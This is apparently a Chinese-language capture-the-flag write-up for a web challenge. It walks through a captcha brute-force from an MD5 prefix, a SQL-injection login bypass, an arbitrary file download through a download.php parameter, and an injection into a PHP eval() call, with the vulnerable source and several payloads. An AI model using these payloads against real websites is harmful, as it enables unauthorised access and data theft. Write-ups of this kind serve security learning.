GetFlag

• 进入页面，发现一个页面，查看源代码没有注释的提示。
• 进入登陆发现是md5前几位截取。用我的submd5.py 找出可以用的验证码
• 在burpsuite里面用万能密码尝试登陆一次。 1‘ or 1=1 #
• 发现成功登陆后会跳转一个页面

<script>alert("Welcome 1' or 1=1 #!");window.location.href="./action.php?action=file";

</script>substr(md5(captcha), 0, 6)=5250e1<div class="box"><b>Captcha: </b></div>

• 先不急着进入这个页面先看看注入能达到什么成功。
• 注入 order by 3 4 有区别。 注入到union select 1,2,3 就怎么也成功不了。看来有一些过滤。
• 不费劲了，转去上面的跳转页面看看。
• 发现能下载三个文件。
• 下载后除了a.php有个 echo "Do what you want to do, web dog, flag is in the web root dir"; 提示外其他两个没用。
• root这个坑我还是以为管理员用户的目录呢。原来是网站根目录。
• 怎么进入根目录呢，我们观察我们下载连接的时候的url

GET /Challenges/file/download.php?f=a.php HTTP/1.1

• f= 指定文件就行了，可能没有过滤。既然是根目录试试/var/www/html/flag.php,就返回一个200 ok 这里我又踩了个坑， 应该是/var/www/html/Challenges/flag.php
• 得到一个php文件。
• 看一下

<?php
$f = $_POST['flag'];
$f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
{
        die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try
{
         eval("\$spaceone = $f");
}
catch (Exception $e)
{
        return false;
}
if ($spaceone === 'flag'){
    echo file_get_contents("helloctf.php");
}

?>

• 所以往Challenges/flag.php 用post方式传一个flag=flag;就得到flag了。
  为什么呢很奇怪。
• 测试这个方法的可行性。

$f='flag;';
eval("\$spaceone = $f");
echo $spaceone;

$f1='flag';
eval("\$spaceone = $f1");
echo $spaceone;

$f2 = 'flag;';
\$spaceone=$f;
echo $spaceone;

• $f会输出flag $f1会输出null $f2会报错
• 这并不能说明什么，因为f没什么本质区别。后来我用assert测试发现$f1也可行。
• 思考assert和eval的区别--assert会执行一个字符串，而eval需要执行一个语句。即assert('phpinfo();') 加不加;都行。 而eval必须的eval('phpinfo();')才行. 所以flag后面加个;
  eval会认为其是个语句。即认为是语句的时候，\就被当成了一个转义字符。
• 第二种解法
  flag= 以下

<<<s
flag
s;
 

四个换行是必须的。还必须换成URL编码。。。。